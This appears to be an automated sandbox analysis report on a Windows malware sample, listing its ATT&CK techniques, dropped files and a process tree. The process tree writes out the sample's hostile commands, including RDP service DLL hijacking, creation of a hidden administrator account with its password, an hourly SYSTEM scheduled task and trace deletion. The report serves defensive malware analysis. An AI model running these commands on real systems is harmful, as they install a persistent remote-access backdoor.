48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0

Analysis

max time kernel
90s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2022 08:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
Size

2.3MB
MD5

8640faa50991a260de7cf73ea56b5461
SHA1

d2a2f5b1a4c3643290e8ce378f3c497c9b6f94d4
SHA256

48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0
SHA512

0ab932f92e210b9171f8fa7cd18ac2ab94a552865bc0fdd72cdc1ebc52e85392730722f3563fd6bb9fc1635e63519d764b89ce600caafa29a5abb506611334cf
SSDEEP

49152:sc+3+iySeZ3sIbHhrQpfHm0RJHqulcsRycArKFU:sca+iTeDQfHm0RJHq9hcArd

Score

9^/10

discovery exploit persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

3348 icacls.exe
3848 icacls.exe
2860 icacls.exe
5004 takeown.exe
4080 icacls.exe
4788 icacls.exe
5036 icacls.exe
820 icacls.exe

pid	process
3348	icacls.exe
3848	icacls.exe
2860	icacls.exe
5004	takeown.exe
4080	icacls.exe
4788	icacls.exe
5036	icacls.exe
820	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\temp222.dat"	reg.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Help\temp221.dat	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation wscript.exe
Loads dropped DLL 3 IoCs

Processes:

48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe

pid process

4104 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
3156
3156
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

5036 icacls.exe
820 icacls.exe
3348 icacls.exe
3848 icacls.exe
2860 icacls.exe
5004 takeown.exe
4080 icacls.exe
4788 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	wscript.exe

pid	process
4104	48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
3156
3156

pid	process
5036	icacls.exe
820	icacls.exe
3348	icacls.exe
3848	icacls.exe
2860	icacls.exe
5004	takeown.exe
4080	icacls.exe
4788	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 3 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\help\temp222.dat	powershell.exe
File created	C:\Windows\help\temp221.dat	powershell.exe
File created	C:\Windows\help\temp220.dat	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

456 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5008 timeout.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

724 reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

3428 powershell.exe
3428 powershell.exe
3428 powershell.exe
3428 powershell.exe
3428 powershell.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

644
644
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeicacls.exe

description pid process

Token: SeDebugPrivilege 3428 powershell.exe
Token: SeRestorePrivilege 4788 icacls.exe

pid	process
456	schtasks.exe

pid	process
5008	timeout.exe

pid	process
724	reg.exe

pid	process
3428	powershell.exe
3428	powershell.exe
3428	powershell.exe
3428	powershell.exe
3428	powershell.exe

pid	process
644
644

description	pid	process
Token: SeDebugPrivilege	3428	powershell.exe
Token: SeRestorePrivilege	4788	icacls.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exewscript.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 4104 wrote to memory of 4904	4104	48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe	wscript.exe
PID 4104 wrote to memory of 4904	4104	48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe	wscript.exe
PID 4904 wrote to memory of 1448	4904	wscript.exe	cmd.exe
PID 4904 wrote to memory of 1448	4904	wscript.exe	cmd.exe
PID 1448 wrote to memory of 5008	1448	cmd.exe	timeout.exe
PID 1448 wrote to memory of 5008	1448	cmd.exe	timeout.exe
PID 1448 wrote to memory of 3428	1448	cmd.exe	powershell.exe
PID 1448 wrote to memory of 3428	1448	cmd.exe	powershell.exe
PID 3428 wrote to memory of 5004	3428	powershell.exe	takeown.exe
PID 3428 wrote to memory of 5004	3428	powershell.exe	takeown.exe
PID 3428 wrote to memory of 4080	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 4080	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 4788	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 4788	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 5036	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 5036	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 820	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 820	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 3348	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 3348	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 3848	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 3848	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 2860	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 2860	3428	powershell.exe	icacls.exe
PID 3428 wrote to memory of 1280	3428	powershell.exe	reg.exe
PID 3428 wrote to memory of 1280	3428	powershell.exe	reg.exe
PID 3428 wrote to memory of 724	3428	powershell.exe	reg.exe
PID 3428 wrote to memory of 724	3428	powershell.exe	reg.exe
PID 3428 wrote to memory of 3144	3428	powershell.exe	net.exe
PID 3428 wrote to memory of 3144	3428	powershell.exe	net.exe
PID 3144 wrote to memory of 1800	3144	net.exe	net1.exe
PID 3144 wrote to memory of 1800	3144	net.exe	net1.exe
PID 4388 wrote to memory of 1104	4388	cmd.exe	net.exe
PID 4388 wrote to memory of 1104	4388	cmd.exe	net.exe
PID 1104 wrote to memory of 4696	1104	net.exe	net1.exe
PID 1104 wrote to memory of 4696	1104	net.exe	net1.exe
PID 3428 wrote to memory of 1760	3428	powershell.exe	cmd.exe
PID 3428 wrote to memory of 1760	3428	powershell.exe	cmd.exe
PID 3428 wrote to memory of 5092	3428	powershell.exe	cmd.exe
PID 3428 wrote to memory of 5092	3428	powershell.exe	cmd.exe
PID 3748 wrote to memory of 3824	3748	cmd.exe	net.exe
PID 3748 wrote to memory of 3824	3748	cmd.exe	net.exe
PID 3824 wrote to memory of 2716	3824	net.exe	net1.exe
PID 3824 wrote to memory of 2716	3824	net.exe	net1.exe
PID 900 wrote to memory of 3340	900	cmd.exe	net.exe
PID 900 wrote to memory of 3340	900	cmd.exe	net.exe
PID 3340 wrote to memory of 4320	3340	net.exe	net1.exe
PID 3340 wrote to memory of 4320	3340	net.exe	net1.exe
PID 912 wrote to memory of 3668	912	cmd.exe	net.exe
PID 912 wrote to memory of 3668	912	cmd.exe	net.exe
PID 3668 wrote to memory of 5032	3668	net.exe	net1.exe
PID 3668 wrote to memory of 5032	3668	net.exe	net1.exe
PID 3776 wrote to memory of 3860	3776	cmd.exe	net.exe
PID 3776 wrote to memory of 3860	3776	cmd.exe	net.exe
PID 3860 wrote to memory of 4184	3860	net.exe	net1.exe
PID 3860 wrote to memory of 4184	3860	net.exe	net1.exe
PID 1328 wrote to memory of 456	1328	cmd.exe	schtasks.exe
PID 1328 wrote to memory of 456	1328	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
"C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4104

C:\Windows\SYSTEM32\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\pomog.vbs
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\pomog.txt pomog.ps1&timeout -t 3& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps1
3⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\system32\timeout.exe
timeout -t 3
4⤵
- Delays execution with timeout.exe
PID:5008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps1
4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3428

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5004

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4080

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5036

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:820

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3348

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3848

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2860

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
5⤵
PID:1280

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\temp222.dat /f
5⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:724

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
5⤵
- Suspicious use of WriteProcessMemory
PID:3144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
6⤵
PID:1800

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
5⤵
PID:1760

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
5⤵
PID:5092

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc OBEz5mPg /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc OBEz5mPg /add
2⤵
- Suspicious use of WriteProcessMemory
PID:1104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc OBEz5mPg /add
3⤵
PID:4696

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:2716

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:900

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IYMUGYHL$ /ADD
3⤵
PID:4320

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:912

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:5032

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc OBEz5mPg
1⤵
- Suspicious use of WriteProcessMemory
PID:3776

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc OBEz5mPg
2⤵
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc OBEz5mPg
3⤵
PID:4184

C:\Windows\System32\cmd.exe
cmd /C schtasks /create /tn 99512 /tr "powershell -nop -ep bypass -f c:\windows\help\31016.ps1" /ru system /sc hourly /mo 1
1⤵
- Suspicious use of WriteProcessMemory
PID:1328

C:\Windows\system32\schtasks.exe
schtasks /create /tn 99512 /tr "powershell -nop -ep bypass -f c:\windows\help\31016.ps1" /ru system /sc hourly /mo 1
2⤵
- Creates scheduled task(s)
PID:456

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12444.txt
Filesize
2.4MB

MD5
ac1bafbc7e973e69602d70d8e0ec3829

SHA1
65ba4b45cbbccd85ec5c155cd7c41736e5a3382c

SHA256
524a02b242b293b05925caa4def1626e9e0facf971d779999ecbc2d2898ed194

SHA512
7b71bc5ee36d44db6b2e226b588d42ed3f67cd73a188f801809dda6fdd37275b57129a2a41dd8f844b26e61c82aa205ab1182e842b7cb728e4f46fb2a233f1d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\65336777.txt
Filesize
36KB

MD5
2c50ffba8c7d98a9cb5fec3c2a6913df

SHA1
849b62f4911551b69cab9bc5ca6cf1af7ca28fc0

SHA256
f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0

SHA512
7d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750

Download Submit
C:\Users\Admin\AppData\Local\Temp\722666222.log
Filesize
62KB

MD5
0c34e2096fc530535d1fb38b8e9f68a6

SHA1
ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a

SHA256
fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb

SHA512
0b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\9887742.txt
Filesize
198KB

MD5
074ff8eac2103666760749711597b336

SHA1
1c349951336d7059807d89163e9c118ef1a6bf26

SHA256
0e22f549a70422bade6e5a19b9efe06c816e90f02f161882a24dde795cb33172

SHA512
7c1f7397367e11ee62cc62f62b059b671409097dd857873c31346d704b0ef7b2d82e318fb8ed1eee3ddb3804ab1f13268190240e2c0ad213c6764118ccdaa237

Download Submit
C:\Users\Admin\AppData\Local\Temp\changes_765543.txt
Filesize
102B

MD5
b72f79c10c59890f9049cb5a6332d680

SHA1
4d3f6fa8a15c2fcaee275983e072207fe1c5b277

SHA256
6589829ca13d08781f77e050907225885692cf6bd64f930ca6c9f9d71740942a

SHA512
f103bca53aac43bcde9a4f9d7da62615861014d6b7e2e4ea775f04a551bf10f5e075a1863d575242d6a927eecc805b47ac5aca67b44a04eb36acb18cf73947dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\nssCECF.tmp\System.dll
Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
C:\Users\Admin\AppData\Local\Temp\pomog.txt
Filesize
39KB

MD5
f140a509e9385574c51a0b6c53d89638

SHA1
c0471a4aa09ccb2fae2214d9fddc758058e4f92f

SHA256
a15fcc9cd5680ba9bb513b46765554d68e8a11fb71826c25bce8cbc6be448af2

SHA512
72baa25c367db6c922c692e6bd9052cb426438570d13e78577f482549a54e51497c5b3ed58dedabf261945a1b8dcb68833b52fdc7dfef9341f0a36c308ce4e3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pomog.vbs
Filesize
142B

MD5
11789c8be9e4201c26d57b0e192489de

SHA1
6917bcfbeb124c48dbc1d08956f84e84b5a53960

SHA256
ce810ffdf9f3462bd9334993b43f3209a5662127519f336ef7d440201f0fa8db

SHA512
dcd2296e9174089d9b4802868cc1f3997ec814b8ab7a60b0a59af9f95742c53dac0fcf07c250f08041e91dcdfaaef1f3493b686c4f6a205543e06f2c801d8804

Download Submit
C:\Windows\Help\temp221.dat
Filesize
940KB

MD5
666b20fd3f3d244f984a470e9d468f53

SHA1
1ed4fcf1994664b8cf511526f54996055f883f95

SHA256
5d9227777bce252a4f1dfbd44e539e0b689cbffa831d8682f90c4df94bdb9873

SHA512
9f0e625ae92a8d81f381e4b2e8dd489d30001481dfee361aca624f53b43177e95d8bf3cc982fd56671eaa59338ea9587464b7ec802885534b3b14300daf1b432

Download Submit
C:\Windows\Help\temp222.dat
Filesize
123KB

MD5
1e38a16381d1a98127bade41544334cf

SHA1
08766e656a810c1e31fe86bfe48eba4483e21bba

SHA256
f832cf40fd4ba232b6005b2d487b40e97761351d6d1f10751fecdaa5a5a579a3

SHA512
9a14f5bbfc76cfa71289edde85363bde7e14c95295da5fed7d8d24bce2379436083f4794955574e4bbe2ad9a0284c93cf4a09952bd0f24f1fce10462ad899635

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
memory/456-175-0x0000000000000000-mapping.dmp

Download
memory/724-155-0x0000000000000000-mapping.dmp

Download
memory/820-150-0x0000000000000000-mapping.dmp

Download
memory/1104-162-0x0000000000000000-mapping.dmp

Download
memory/1280-154-0x0000000000000000-mapping.dmp

Download
memory/1448-135-0x0000000000000000-mapping.dmp

Download
memory/1760-164-0x0000000000000000-mapping.dmp

Download
memory/1800-157-0x0000000000000000-mapping.dmp

Download
memory/2716-167-0x0000000000000000-mapping.dmp

Download
memory/2860-153-0x0000000000000000-mapping.dmp

Download
memory/3144-156-0x0000000000000000-mapping.dmp

Download
memory/3340-168-0x0000000000000000-mapping.dmp

Download
memory/3348-151-0x0000000000000000-mapping.dmp

Download
memory/3428-140-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmp

Filesize
10.8MB

Download
memory/3428-171-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmp

Filesize
10.8MB

Download
memory/3428-158-0x00007FFB85BD0000-0x00007FFB86691000-memory.dmp

Filesize
10.8MB

Download
memory/3428-139-0x000001938A540000-0x000001938A562000-memory.dmp

Filesize
136KB

Download
memory/3428-138-0x0000000000000000-mapping.dmp

Download
memory/3668-170-0x0000000000000000-mapping.dmp

Download
memory/3824-166-0x0000000000000000-mapping.dmp

Download
memory/3848-152-0x0000000000000000-mapping.dmp

Download
memory/3860-173-0x0000000000000000-mapping.dmp

Download
memory/4080-147-0x0000000000000000-mapping.dmp

Download
memory/4184-174-0x0000000000000000-mapping.dmp

Download
memory/4320-169-0x0000000000000000-mapping.dmp

Download
memory/4696-163-0x0000000000000000-mapping.dmp

Download
memory/4788-148-0x0000000000000000-mapping.dmp

Download
memory/4904-133-0x0000000000000000-mapping.dmp

Download
memory/5004-145-0x0000000000000000-mapping.dmp

Download
memory/5008-137-0x0000000000000000-mapping.dmp

Download
memory/5032-172-0x0000000000000000-mapping.dmp

Download
memory/5036-149-0x0000000000000000-mapping.dmp

Download
memory/5092-165-0x0000000000000000-mapping.dmp

Download